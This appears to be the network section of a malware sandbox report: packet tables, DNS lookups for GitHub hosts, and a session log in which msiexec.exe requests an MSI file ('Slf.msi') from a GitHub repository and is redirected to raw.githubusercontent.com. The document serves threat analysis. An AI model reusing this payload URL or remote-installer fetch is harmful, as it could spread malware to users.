Nov 30, 2024 01:25:08.930624008 CET | 443 | 49709 | 185.199.108.133 | 192.168.2.6
Nov 30, 2024 01:25:08.930694103 CET | 49709 | 443 | 192.168.2.6 | 185.199.108.133
                                                                                                              Nov 30, 2024 01:25:08.930701017 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:08.930744886 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:08.957410097 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:08.957433939 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:08.957506895 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:08.957515955 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:08.957556009 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.088910103 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.088941097 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.089001894 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.089020967 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.089056015 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.089107037 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.096263885 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.096287966 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.096394062 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.096400023 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.096445084 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.102787018 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.102827072 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.102888107 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.102894068 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.102940083 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.109183073 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.109235048 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.109383106 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.109391928 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.109436035 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.116595030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.116622925 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.116697073 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.116703987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.116746902 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.123527050 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.123548985 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.123611927 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.123619080 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.123656988 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.131023884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.131042957 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.131103039 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.131109953 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.131148100 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.158284903 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.158309937 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.158418894 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.158432961 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.158473015 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.289007902 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.289046049 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.289105892 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.289125919 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.289153099 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.289171934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.296401978 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.296418905 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.296505928 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.296511889 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.296551943 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.303802013 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.303817987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.303903103 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.303910017 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.303952932 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.310338974 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.310353994 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.310424089 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.310437918 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.310473919 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.317857981 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.317873955 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.317944050 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.317950964 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.317992926 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.324814081 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.324829102 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.324915886 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.324932098 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.324966908 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.332362890 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.332376957 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.332463980 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.332478046 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.332515001 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.360693932 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.360713005 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.360950947 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.360966921 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.361011982 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.490217924 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.490241051 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.490411997 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.490432978 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.490653038 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.497704029 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.497729063 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.497972012 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.497988939 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.498035908 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.505023956 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.505043983 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.505124092 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.505131960 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.505168915 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.512497902 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.512516022 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.512614012 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.512619972 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.512654066 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.519062042 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.519081116 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.519161940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.519171000 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.519213915 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.526120901 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.526139975 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.526227951 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.526259899 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.526299953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.533519030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.533535957 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.533622980 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.533631086 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.533678055 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.561192036 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.561222076 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.561285973 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.561292887 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.561338902 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.691402912 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.691431999 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.691632986 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.691658974 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.691701889 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.698815107 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.698829889 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.698909044 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.698914051 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.698949099 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.706175089 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.706192017 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.706250906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.706255913 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.706289053 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.713691950 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.713706970 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.713778019 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.713783979 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.713818073 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.720235109 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.720251083 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.720314980 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:09.720319986 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:09.720357895 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.720370054 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.727675915 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.727699041 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.727780104 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.727801085 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.727859020 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.734648943 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.734666109 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.734751940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.734781027 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.734836102 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.742145061 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.742161036 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.742228985 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.742234945 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.742275953 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.780793905 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.780839920 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.780889988 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.780953884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.781001091 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.781019926 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.925107956 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.925131083 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.925211906 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.925236940 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.925281048 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.932574987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.932594061 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.932682037 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.932703018 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.932745934 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.939121962 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.939137936 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.939191103 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.939202070 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.939228058 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.939244032 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.946703911 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.946719885 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.946779966 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.946796894 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.946834087 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.953988075 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.954003096 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.954077959 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.954092979 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.954137087 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.960939884 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.960957050 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.961025000 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.961034060 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.961071968 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.968460083 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.968475103 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.968553066 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.968560934 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.968600035 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.994652987 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.994668961 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.994739056 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:10.994757891 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:10.994792938 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.126485109 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.126508951 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.126580000 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.126600027 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.126641989 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.133949995 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.133964062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.134038925 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.134046078 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.134084940 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.140501976 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.140517950 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.140568018 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.140574932 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.140611887 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.147994995 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.148011923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.148082972 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.148089886 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.148130894 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.155368090 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.155385017 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.155448914 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.155457020 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.155499935 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.162468910 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.162487030 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.162549019 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.162558079 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.162604094 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.169856071 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.169892073 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.169951916 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.169961929 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.170001030 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.195848942 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.195869923 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.195943117 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.195960045 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.196006060 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.394608021 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.394638062 CET44349709185.199.108.133192.168.2.6
                                                                                                              Nov 30, 2024 01:25:11.394649029 CET49709443192.168.2.6185.199.108.133
                                                                                                              Nov 30, 2024 01:25:11.394655943 CET44349709185.199.108.133192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2024 01:25:00.050364017 CET | 63801 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2024 01:25:00.187908888 CET | 53 | 63801 | 1.1.1.1 | 192.168.2.6
Nov 30, 2024 01:25:03.259892941 CET | 49505 | 53 | 192.168.2.6 | 1.1.1.1
Nov 30, 2024 01:25:03.398808956 CET | 53 | 49505 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2024 01:25:00.050364017 CET | 192.168.2.6 | 1.1.1.1 | 0x5189 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:03.259892941 CET | 192.168.2.6 | 1.1.1.1 | 0x56dc | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2024 01:25:00.187908888 CET | 1.1.1.1 | 192.168.2.6 | 0x5189 | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:03.398808956 CET | 1.1.1.1 | 192.168.2.6 | 0x56dc | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:03.398808956 CET | 1.1.1.1 | 192.168.2.6 | 0x56dc | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:03.398808956 CET | 1.1.1.1 | 192.168.2.6 | 0x56dc | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:03.398808956 CET | 1.1.1.1 | 192.168.2.6 | 0x56dc | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:05.033740044 CET | 1.1.1.1 | 192.168.2.6 | 0x5537 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2024 01:25:05.033740044 CET | 1.1.1.1 | 192.168.2.6 | 0x5537 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:12.104166031 CET | 1.1.1.1 | 192.168.2.6 | 0x7114 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 30, 2024 01:25:12.104166031 CET | 1.1.1.1 | 192.168.2.6 | 0x7114 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:16.120347023 CET | 1.1.1.1 | 192.168.2.6 | 0x3788 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:25:16.120347023 CET | 1.1.1.1 | 192.168.2.6 | 0x3788 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:26:14.000999928 CET | 1.1.1.1 | 192.168.2.6 | 0xcf5c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 01:26:14.000999928 CET | 1.1.1.1 | 192.168.2.6 | 0xcf5c | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
• github.com
• raw.githubusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 20.233.83.145 | 443 | 4896 | C:\Windows\System32\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-30 00:25:02 UTC | 145 | OUT | GET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: github.com
2024-11-30 00:25:03 UTC | 552 | IN | HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 30 Nov 2024 00:25:02 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msi
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
